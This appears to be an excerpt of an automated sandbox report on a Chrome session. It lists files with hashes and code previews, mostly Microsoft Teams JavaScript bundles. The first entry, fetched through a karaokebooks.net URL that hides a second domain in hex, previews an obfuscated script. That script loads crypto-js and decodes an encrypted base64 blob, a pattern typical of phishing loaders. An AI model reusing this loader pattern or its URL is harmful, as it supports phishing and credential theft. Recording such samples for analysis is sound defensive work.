                                                                                                                                                                                                                                                                            Entropy (8bit):5.951284177546609
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:duHe4fzBphmAX+s8SSTduKbuxWmHmBs2bTrKLteFuzqF08i6HguABHCGdlWP0oft:c7bzqbaYNZbqLCFWTh/DWP0oFAuIni1
                                                                                                                                                                                                                                                                            MD5:07D2CDE99D9BD9FE0EB2CA976637E02E
                                                                                                                                                                                                                                                                            SHA1:1820134A35411CE1D825BFF697C2BB82A2EC6D49
                                                                                                                                                                                                                                                                            SHA-256:271D64B77E9FAC395D61C8D91406452C91517BCA91751D37E47E3724736C090B
                                                                                                                                                                                                                                                                            SHA-512:EA3E9C358B4A223E8E2DF688B98C093DF5384E83F2A7EF37AB97B85FE646574ACEE165B2AC7C27DA9811A72CBF98D70F5FC87BA3FB2B2585E562D0B1BCF71945
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://karaokebooks.net/res444.php?2-68747470733a2f2f6a394c672e786279686971626a6c2e636f6d2f61646d692f-oakwood
                                                                                                                                                                                                                                                                            Preview: var sMBccmQkbmwCazMF = document.createElement("script");..sMBccmQkbmwCazMF.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(sMBccmQkbmwCazMF);..sMBccmQkbmwCazMF.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoid24yVUY4VlJkUmkycVVpWXdhNlR1QzBqUHlXbktMWEpRb1FzM1Y5RUlKRTMxbW5MNmlSOEJtRmc0d1hjWERvZncxZU8wRDBpK2tYXC9JOUttUU1QZWFlMk12SXYrVjVSeXZQWU9KNHRZNHNWY3dcL2Q3NFRaUk9kbkxcL3d5ZDhkYzRZSFdEV2xxV3hVelhFQnQ2SUl6WnloVHpvQmpkK0xSdzhhRlwvSkhvN3dWRUtlMEtrMFNkWDJoT09lVUhmRFVzMHkzWDZ2MU9qMkRuWndSVDZuVWkxelJRd0lXUDRyUktKWURJNGlkNm9SMlRBQVdSXC9OT0VHU1VacldTR3pkVGxrWExDeTQyYmkzeEJraGtjWnI2SGNud2JRU3NDdzNWd1c0QnlZK1ZzY2NpWDQ0NGJ4RWZrZ2ZKbzRJZDBSZDFlTlkzcEEzR241ZnU5VUZCZ2xUYVptWFZUQmpVWU16TEZcLzNDUGxBWkNRWmIybkpiU0l6WDlCaXZvRDNGMHBrdXN1NG5LWDk0TlgyZ0VPQ2s0elRCZHpkM25XU3ZVTkdOK1JjWW5kdGRsU3BpTitIYk1wRUFKUjFxeVJ5NE13VkZ0TjYxcjkrRVpBM3FlY2UwVlFZXC94TDF0a0hhSzFCQ1FPVlwvN0Ztam1zUTI1VTMxQ3k3ZnhtUUpNTUhPVUxZZDA2OWJ3czlOaGRJYX
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (9134)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):9242
                                                                                                                                                                                                                                                                            Entropy (8bit):4.404128445775363
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:iDFksNgUbgpo5MQ5M5McwlVGDVMhlVZjhJkumEfwgQPHs:iDFkygUbgpglVGDVMHVBhaxEfwNPHs
                                                                                                                                                                                                                                                                            MD5:15E757F3AE9AD0971F5C48C2231B0178
                                                                                                                                                                                                                                                                            SHA1:BA615ADCE70BB482564FEE278061E8A133DB7003
                                                                                                                                                                                                                                                                            SHA-256:8A8082EDD76FC84B7C2548C2B6EACF69D5CC2040FE59149D7D2E74D5C79D6155
                                                                                                                                                                                                                                                                            SHA-512:542BE9098B408A5FB2FCAC0E589EDC41606A7AF93B52C87BCE1632A6009BD3D51F262CF679A7378401B46810CAE3D7C4A0E5477C098A73D793A458D40EC5E23C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/909600-d04627bb00218ec6.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[909600],{909600:(a,Z,l)=>{l.d(Z,{dsn:()=>c,pF6:()=>h,glr:()=>v,HVY:()=>e,lVp:()=>A,dcR:()=>r,Dk8:()=>C,MzH:()=>M,e2F:()=>V,jtT:()=>H,FXX:()=>d,unN:()=>n,Sn0:()=>t,Bv7:()=>U,FWW:()=>i,DmZ:()=>u,T1S:()=>R,ysh:()=>F,G4Y:()=>g,M88:()=>s,mMu:()=>L});var m=l(693935);const c=(0,m.U)("CalendarError24Filled","24",["M21 12.02V8.5H3v9.25C3 19.55 4.46 21 6.25 21h5.77A6.5 6.5 0 0 1 21 12.02Zm0-5.77C21 4.45 19.54 3 17.75 3H6.25A3.25 3.25 0 0 0 3 6.25V7h18v-.75Zm2 11.25a5.5 5.5 0 1 0-11 0 5.5 5.5 0 0 0 11 0Zm-6-3a.5.5 0 0 1 1 0v4a.5.5 0 0 1-1 0v-4Zm1.13 6a.62.62 0 1 1-1.25 0 .62.62 0 0 1 1.25 0Z"]),h=(0,m.U)("CalendarError24Regular","24",["M17.75 3C19.55 3 21 4.46 21 6.25v5.77c-.46-.3-.97-.53-1.5-.7V8.5h-15v9.25c0 .97.78 1.75 1.75 1.75h5.06c.18.53.42 1.04.71 1.5H6.25A3.25 3.25 0 0 1 3 17.75V6.25C3 4.45 4.46 3 6.25 3h11.5Zm0 1.5H6.25c-.97 0-1.75.78-1.75 1.75V7h15v-.75c0-.97-.78-1.75-1.75-1.7
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (30462)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):30570
                                                                                                                                                                                                                                                                            Entropy (8bit):5.510739701129899
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:WNSQEsqQWt1zSjrOk5PYUSh+UeGFZgccgrmx/iM6q4/cc1KTVziE5cFfg4tOhUPd:WjEsqQFSWGYmrKsychRUUTh
                                                                                                                                                                                                                                                                            MD5:1496BCB2E6FDB9D8FA0DD1E2B99E40A2
                                                                                                                                                                                                                                                                            SHA1:9189D43FE1DCB56D4D51434244E5A28C4EB06F98
                                                                                                                                                                                                                                                                            SHA-256:7B79DFAC6229F607A4D0AC9E5687999933EF21B96650EA8E6439FA6E46B0A6B8
                                                                                                                                                                                                                                                                            SHA-512:3D00EB119CD1FB5D6065B025BFDD56E09B3EC5C4C91E09A28A4725BF19C7CA8FABB2CCB837A4F237E2AE91C56EE0BF94F749840A194F2609FE08ECD7E2785300
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/411326-fee4befbdfec8c54.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[411326,85394],{85394:(e,t,a)=>{a.d(t,{m:()=>M});var o=a(513432),r=a(733071),n=a(854687),s=a(750818),l=a(35871),i=a(531389),c=a(478304),d=a(585536),f=a(164093),u=a(602835),m=a(264278),p=a(293037),v=a(313666),b=a(39186),y=a(488351),B=a(132915),g=a(779134),h=a(95500);function w(e,t,a){const{state:{open:r,setOpen:n,getOptionById:s},defaultProps:l,activeDescendantController:i}=a,c=o.useRef(""),[d,f]=(0,B.Z)(),u=(e,t={startFromNext:!1})=>{const{startFromNext:a}=t,o=i.active(),r=i.find((t=>{const a=s(t);return!!a&&e(a.text)}),{startFrom:a?i.next({passive:!0}):o});return r||i.find((t=>{const a=s(t);return!!a&&e(a.text)}))},p=(0,g.w)(e,t,{state:a.state,defaultProps:l,elementType:"button",activeDescendantController:i});return p.onKeyDown=(0,m.p)((e=>{f(),"Type"===(0,h.p)(e)&&(c.current+=e.key.toLowerCase(),d((()=>{c.current=""}),500),r&&(u((e=>0===e.toLocaleLowerCase().indexOf(c.curren
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1846)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1954
                                                                                                                                                                                                                                                                            Entropy (8bit):5.235922559299956
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3ajYEjENkjuX8Vv30IaCUcYtZsjhasXls2OvGpYsHHfWs3lJF2t7AsQksbR:4jYEjENkjuXgvESUDXUaklcsYOesj2t8
                                                                                                                                                                                                                                                                            MD5:1D699FA4A71C9B7AF307FD055FD60673
                                                                                                                                                                                                                                                                            SHA1:17881139B9A85CB04CE94F7D69FDB3A146A075F2
                                                                                                                                                                                                                                                                            SHA-256:4DA7BFBBFBE1C5B2A2AD8E4B71D35054943BEE0810045738DB645D2F99CE66FF
                                                                                                                                                                                                                                                                            SHA-512:7D9AEB65B5FE25560BD2E14C4BDCAED9D63C1563E459528A0C1964B66E59688B1A3A358368B44172C3DE97134B9F008D60B6BC922C1DB0586ADC45DBD034BD97
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[829271,51652],{829271:(e,t,o)=>{o.r(t),o.d(t,{AnnounceProvider:()=>M,AnnounceProvider_unstable:()=>M,BackgroundAppearanceProvider:()=>w,CustomStyleHooksContext_unstable:()=>k,CustomStyleHooksProvider_unstable:()=>y,OverridesProvider_unstable:()=>p,PortalMountNodeProvider:()=>H,Provider_unstable:()=>P,ThemeClassNameProvider_unstable:()=>a,ThemeContext_unstable:()=>r,ThemeProvider_unstable:()=>u,TooltipVisibilityProvider_unstable:()=>c,useAnnounce:()=>O,useAnnounce_unstable:()=>O,useBackgroundAppearance:()=>N,useCustomStyleHook_unstable:()=>A,useFluent_unstable:()=>x,useOverrides_unstable:()=>h,usePortalMountNode:()=>S,useThemeClassName_unstable:()=>d,useTooltipVisibility_unstable:()=>C});var n=o(513432);const r=n.createContext(void 0),u=r.Provider,i=n.createContext(void 0),s="",a=i.Provider;function d(){var e;return null!==(e=n.useContext(i))&&void 0!==e?e:s}const v=n.createCo
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (29164)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):29271
                                                                                                                                                                                                                                                                            Entropy (8bit):5.260754552284906
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:DQ67DRxmNsJwEtzCsJLpWby1gGDsksG0LsYz2kWSPzQDsS4TipmP13YUE:dnRxmNs7JCZyTRsNLAFgG
                                                                                                                                                                                                                                                                            MD5:E15F49CEEEF1DFCBB6895C908C5C95A0
                                                                                                                                                                                                                                                                            SHA1:D20EEB38BBE2444DDB00EF916FFE0CF7F9EFD6DE
                                                                                                                                                                                                                                                                            SHA-256:BC2E59A7B53B6FB40172062F2EAB834C410A2AB4308B338B597F87D68C45CE85
                                                                                                                                                                                                                                                                            SHA-512:42B20B5D7AAF393E3C006ACF75A1343AC4BE0F5A8451F5178F39873FB1162A7AC8076333059C7126E56EEDBA672470B70F402C90F295D4B1A53C1C2A3786EE64
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[56182],{469218:(e,t,i)=>{var r;i.d(t,{f:()=>I}),function(e){e.p720="720p",e.p1080="1080p",e.p2k="2k",e.p4k="4k",e.unkown="unkown"}(r||(r={}));const s=2073600,n=3686400,o=8294400;async function a(e){const t={Perf_Screen:void 0};let i;const a=e.screen.availWidth*e.screen?.availHeight;return i=a<s?r.p720:a>=s&&a<n?r.p1080:a>=n&&a<o?r.p2k:a>=o?r.p4k:r.unkown,t.Perf_Screen={width:e.screen?.availWidth,height:e.screen?.availHeight,resolution:i,dpr:e.devicePixelRatio},Promise.resolve(t)}var c;!function(e){e.Initializing="Initializing",e.Unrecoverable="Unrecoverable",e.LongInactive="LongInactive",e.Inactive="Inactive",e.Active="Active",e.VeryActive="VeryActive"}(c||(c={}));var l=i(492090),p=i(332752),h=i(34655),d=i(873529),u=i(464122);async function m(e,t,i){const r={workers:[],processes:[],windows:[]},s=await(e?.loadModule("heartbeat"));if(!s?.getPerfMetrics)return r;const n=r;try{le
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (28816)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):28923
                                                                                                                                                                                                                                                                            Entropy (8bit):5.333485791515068
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:QyMDkxfYbxQMlxIpxvWxgGUFW+DUa5VmoHkv2S2JDBxI5Qy8/gTbocPoQDcf9M:LgkalIpYxgWcB4C/gTccPp
                                                                                                                                                                                                                                                                            MD5:BA4B4438C9D00B3A7D9F98503619A826
                                                                                                                                                                                                                                                                            SHA1:97340947E543E5E8FF3CA93B563FD97F42C73111
                                                                                                                                                                                                                                                                            SHA-256:33A2DF3C4718E760FFF787A29B49C7A5792BC84D94DE1981ED6D14B142FDBFDA
                                                                                                                                                                                                                                                                            SHA-512:049813B3D700FCD91A7343FACAC627AE778DF05E5F834E2B4CF8A595EDA0C34FD8901C08DDD57B464C929BFD293E35350F91B235883A07ACBC13E0AAAA78F2F3
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[95061],{598166:(t,e,n)=>{"use strict";function r(t){return t.split("-")[1]}function i(t){return"y"===t?"height":"width"}function o(t){return t.split("-")[0]}function a(t){return["top","bottom"].includes(o(t))?"x":"y"}function s(t,e,n){let{reference:s,floating:l}=t;const c=s.x+s.width/2-l.width/2,f=s.y+s.height/2-l.height/2,u=a(e),d=i(u),p=s[d]/2-l[d]/2,h="x"===u;let g;switch(o(e)){case"top":g={x:c,y:s.y-l.height};break;case"bottom":g={x:c,y:s.y+s.height};break;case"right":g={x:s.x+s.width,y:f};break;case"left":g={x:s.x-l.width,y:f};break;default:g={x:s.x,y:s.y}}switch(r(e)){case"start":g[u]-=p*(n&&h?-1:1);break;case"end":g[u]+=p*(n&&h?-1:1)}return g}n.d(e,{UE:()=>g,rD:()=>l,__:()=>u,UU:()=>b,jD:()=>I,ER:()=>L,cY:()=>E,B1:()=>f,BN:()=>k,Ej:()=>B});const l=async(t,e,n)=>{const{placement:r="bottom",strategy:i="absolute",middleware:o=[],platform:a}=n,l=o.filter(Boolean),c=await(null==a.isRTL?
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):106613
                                                                                                                                                                                                                                                                            Entropy (8bit):5.221372982138273
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:nG7SEq8Kx6NhjorZvVwb4HA7JNaKXI7MDn8kkeI:BKAtgXI7MDnPI
                                                                                                                                                                                                                                                                            MD5:D9554F14CE447CB79D1FA56607B0FB7D
                                                                                                                                                                                                                                                                            SHA1:FA6A51E1AC1C63F54F8424AAD4E1BE461F333715
                                                                                                                                                                                                                                                                            SHA-256:8F4BD8B14489FD5E54F94731ECAA774DEA700646823DCE51A45E378854573D77
                                                                                                                                                                                                                                                                            SHA-512:1FC84B0ED7683413ACE778F0E55BB3B98F70E1444BC440644F03A4852A0B9DDB015B26715EA0A7263892F0FD1923959EE6D7AEDE2B203FD675A86FFE76A8FC43
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/625778-b6002c0e749999a8.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[625778],{40478:(e,t,s)=>{s.d(t,{u:()=>r});var i=s(362328);const r={kind:"Document",get definitions(){const e=(0,i.G)("query userInviteLink {userInviteLink}");return delete this.definitions,this.definitions=e.definitions}}},52529:(e,t,s)=>{s.d(t,{L:()=>a,G:()=>n});var i=s(362328);const r={kind:"Document",get definitions(){const e=(0,i.G)("mutation addUpdateMostFrequentlyUsedContact($mfuContact:MfuContactInput!) {addUpdateMostFrequentlyUsedContact(mfuContact:$mfuContact) {id,alias}}");return delete this.definitions,this.definitions=e.definitions}},n=(e,t)=>{a(e,{alias:t})},a=(e,t)=>{e.mutate({mutation:r,variables:{mfuContact:t}})}},475637:(e,t,s)=>{s.d(t,{F:()=>r});var i=s(362328);const r={kind:"Document",get definitions(){const e=(0,i.G)("mutation ComponentsPeoplePickerInitSubstrateSearchMutation($scenarioName:String!,$convId:String) {initSubstrateSearch(scenarioName:$scenario
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (15751)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):15858
                                                                                                                                                                                                                                                                            Entropy (8bit):5.348387861845832
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:zHoM0U7A+ya03ytZ4JDZKK4rBAXjeJ8/L5bkp3eLQyV8Q:zHoM0U7A+yar4JD8KyBAXjeJcL1aeLQE
                                                                                                                                                                                                                                                                            MD5:3087871979030B3F8FFD6C1C8A7DD019
                                                                                                                                                                                                                                                                            SHA1:88CAE82471D1257F9B74C453A7076E2AB0D18321
                                                                                                                                                                                                                                                                            SHA-256:9E9CDCD584A8326B573EC923937919440FAFA020C5BDC1B954F8632F0184D85D
                                                                                                                                                                                                                                                                            SHA-512:714798C975E45D7F1E06357D242EEDEF5389004DC4716EA2A13D5E907232B6CF92393913DEEDFF02AF179D174BDBFA03B242C43B6AE0CF58086F60083465FEDC
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[78219],{78219:(e,t,o)=>{o.d(t,{aQ:()=>b,yc:()=>E,Hm:()=>A,nF:()=>M,n:()=>I,OP:()=>w,Dk:()=>S,vh:()=>v,Y3:()=>x,qO:()=>U,Gd:()=>V,fw:()=>$,sE:()=>q,SQ:()=>N,wh:()=>R,ih:()=>F,EV:()=>G,dw:()=>P,fo:()=>H,aC:()=>z,g8:()=>W,H4:()=>K,ZH:()=>J,F9:()=>Q,Xz:()=>Z,$6:()=>Y,cO:()=>j,SS:()=>ee});var r=o(847431),a=o(625292),n=o(848020),i=o(802756),c=o(955262),s=o(923226),d=o(417694),u=o(406138),l=o(703478),p=o(935008),h=o(348773),y=o(161024),g=o(366603),m=o(211713),C=o(775251),f=o(299096),k=o(920506);const b=(e,t)=>{const{id:o,type:r,role:a,profile:n,subType:i,cloud:c,homeAccountId:s}=e,l=_(e),h=c!==l.cloud,y=d.Vh.getValue((0,u.Xr)((0,p.X_)(e)).telemetryInfo);t.setUserToTelemetryContext({id:o,type:r,role:a,oid:n?.oid,tid:n?.tid,subType:i,isCrossCloudUser:!!y?.isCrossCloudUser,isExternal:(0,p.ge)(o,s),userCloud:l.cloud,homeAccountId:h?l.cloud:l?.id,homeTenantId:h?l.cloud:l?.profile.tid})},
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (7902)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):8010
                                                                                                                                                                                                                                                                            Entropy (8bit):5.293871497905616
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:QxM0ytizz70XhjrgRn7Ekl12Tuyd61aYoxG3wjs:uM0WUwXhf+IklI6yAEYoxG3wI
                                                                                                                                                                                                                                                                            MD5:E62051243249EC6F803DD2B7E785281D
                                                                                                                                                                                                                                                                            SHA1:12DB14106F5898E612497E89FD3B77978F25F3F6
                                                                                                                                                                                                                                                                            SHA-256:79E3BCA0BA57C50F34F306B64A1EDDD3F053629C9CF9BB54CFE5257A3B1C1859
                                                                                                                                                                                                                                                                            SHA-512:4610FB7F66728556DF7971018B7A17D06C1AF0C454AA8A7D0B377C79DA217BD0D4F7A8835A066A73CD2C59FCF33EA3C98431ABA9E5AE307BD36CE00CC812EDAE
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/981462-a65d26860dc6b1e3.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[981462],{981462:(e,t,i)=>{i.d(t,{v:()=>R});var n=i(203557),r=i(407845),o=i(405501),a=i(953760);const s={...i(965991).MX,PairwiseBrokerApplicationInitializeBrokering:"pairwiseBrokerApplicationInitializeBrokering",BrokerClientApplicationHandleBrokerHandshake:"brokerClientApplicationHandleBrokerHandshake",BrokerClientApplicationBrokeredSSOSilentRequest:"brokerClientApplicationBrokeredSSOSilentRequest",BrokerClientApplicationBrokeredSilentRequest:"brokerClientApplicationBrokeredSilentRequest",EmbeddedClientApplicationSendSSOSilentRequest:"embeddedSSOSilent",EmbeddedClientApplicationSendPopupRequest:"embeddedPopup",EmbeddedClientApplicationSendRedirectRequest:"embeddedRedirect",EmbeddedClientApplicationHandleRedirectRequest:"embeddedHandleRedirect",EmbeddedClientApplicationSendSilentRefreshRequest:"embeddedSilentRefresh"},l=new Map([[s.PairwiseBrokerApplicationInitializeBrokering,
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):426912
                                                                                                                                                                                                                                                                            Entropy (8bit):5.4498344137516215
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:kKzjyys5YV099i5RA9gML/duh3vNj3Rg+Y6Vsa:tzOys5YO99WRe7L/duh3v93Rg+Y6Vsa
                                                                                                                                                                                                                                                                            MD5:153D124C38EA6EFA924242505C8A06D9
                                                                                                                                                                                                                                                                            SHA1:66710A92D91A98477773F057BBCFDA87B0E0787A
                                                                                                                                                                                                                                                                            SHA-256:F1D115C4E6762C925960B485F3905206F99905E41B2EB186747AF2D3855D8B3B
                                                                                                                                                                                                                                                                            SHA-512:7FF49C563BECCB475B95F6BCF322864A935F936A4F448E9644EE04B6E2B6A076CC0F405A5EC8277667A38A8484928C5F547FAA689B18DF56CAA65E762207C5BF
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/477986-5fa25e5ae7024e18.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[477986,938490,249643],{831890:(e,i,t)=>{"use strict";t.d(i,{hw:()=>O});var n=t(526521),o=t(795631),a=t(763588),l=t(251763),d=t(513432),s=t.n(d),c=t(249643),r=t(361765),u=t(965804);const v=(0,u.O)({appBar:{Bqenvij:"f1l02sjl",a9b677:"f124akge"},twoColumnViewBackground:{De3pzq:"f1ctqxl6"},threeColumnViewBackground:{De3pzq:"f3vzo32"},wideAppBar:{a9b677:"f3swjwz",z8tnut:"f1g0x7ka",z189sj:["fhxju0i","f1cnd47f"],Byoj8tv:"f1qch9an",uwmqm3:["f1cnd47f","fhxju0i"]},verticalGap:{i8kkvl:0,Belr9w4:0,rmohyg:"f1yhwmi5"},mercuryDesignAppBar:{a9b677:"f124akge",z8tnut:"f1809wu7",z189sj:["f81rol6","frdkuqy"],Byoj8tv:"f1qch9an",uwmqm3:["frdkuqy","f81rol6"]},tileContainer:{sshi5w:"f17wyjut",B68tc82:"f1mtd64y"},tileContainerCenterAligned:{Bh6795r:"f1h4v2dc",Brf1p80:"f4d9j23",sshi5w:"f17wyjut",B68tc82:"f1mtd64y"},tileContainerWide:{sshi5w:"fsuw20m"},tileContainerWideCenterAligned:{Bh6795r:"f1h4v2dc",Brf1p80:"f4d
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (36103)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):36211
                                                                                                                                                                                                                                                                            Entropy (8bit):5.261480504529277
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:vFORCEcOC/BExYLil95/8ZpA2Me/vDwYNtvE:vVZNLie73ZtvE
                                                                                                                                                                                                                                                                            MD5:7F5787BE53067A2AD5210A29F8E320F9
                                                                                                                                                                                                                                                                            SHA1:B6A10C98183301615C2C8350B537793049940A96
                                                                                                                                                                                                                                                                            SHA-256:B85FC31F32AC2F798BBBE739B1D0CD3D199DBFA2D92F86C0159EF4FB2520CBD4
                                                                                                                                                                                                                                                                            SHA-512:E0E3662E5AC05FADF7F25D1639617B5DD31ECF5CD37142B81F64AF9FEC1B61BBCE1B3B911D2AD303E11BCB395325051D941814D2663D9764038552E2C8AF4281
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[712315],{805627:function(e,t,n){var o,r=this&&this.__extends||(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)t.hasOwnProperty(n)&&(e[n]=t[n])},function(e,t){function n(){this.constructor=e}o(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)});Object.defineProperty(t,"__esModule",{value:!0});var i,s=n(535817),a=n(337315),l=function(){function e(e){this._formatter=e||new c}return e.prototype.formatter=function(){return this._formatter},e.prototype.receiveAll=function(){return!1},e.prototype.levels=function(){return null},e}();function u(e){return(4294967296+e).toString(16).substr(-8)}function f(e,t){return(1e12+e).toString(10).substr(-t)}t.AbstractLogAppender=l,function(e){e[e.Timestamp=1]="Timestamp",e[e.Component=4]="Component",e[e.Level=8]="Level",e[e.FullDate=32]="FullDate",e[e.Lo
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (5317)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):5425
                                                                                                                                                                                                                                                                            Entropy (8bit):4.510492774043985
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:W5jzKZX9doTTJgVyQHWrGc+6EsKrz5TQcy506rEGpQmFwgLm1XFwHM8+gIo4uIEi:iQ/iw5M1506rNIMpX+gvxrCT
                                                                                                                                                                                                                                                                            MD5:EB7D33F4299E9BF95AFF1CC7FD32D4F1
                                                                                                                                                                                                                                                                            SHA1:9A290ED2C80EE7F68E4E1A7A9EA4414FA97FEB03
                                                                                                                                                                                                                                                                            SHA-256:9B564293076EC3C532C8B1F744D93366B6E6FFBE75737597ED56F5725DD89E7F
                                                                                                                                                                                                                                                                            SHA-512:9A9ACC57568928710FC19A3E505DCBCFAAEFAEEDDFEE36AAB7E87600E43BF6062EB0125AB6747FDCBBEC65AE0D6D9DB1A3795C987882DCD98B3199C6277F2215
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/924039-ece960d105d7bb44.js
